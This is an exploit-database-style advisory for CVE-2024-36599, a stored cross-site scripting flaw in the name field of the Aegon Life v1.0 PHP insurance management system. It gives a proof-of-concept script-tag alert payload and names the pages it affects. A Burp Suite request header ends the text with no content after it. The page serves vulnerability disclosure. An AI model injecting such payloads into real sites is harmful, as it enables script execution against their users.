Aegon life v1.0 life insurance management system stored crosssite scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-06-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Aegon life v1.0 life insurance management system stored crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)
# Exploit Author: Aslam Anwar Mahimkar
# Date: 18-05-2024
# Category: Web application
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
# Version: AEGON LIFE v1.0
# Tested on: Linux
# CVE: CVE-2024-36599
# Description:
----------------
A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.
# Payload:
----------------
<script>alert(document.domain)</script>
# Attack Vectors:
-------------------------
To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.
# Burp Suite Request:
----------------------------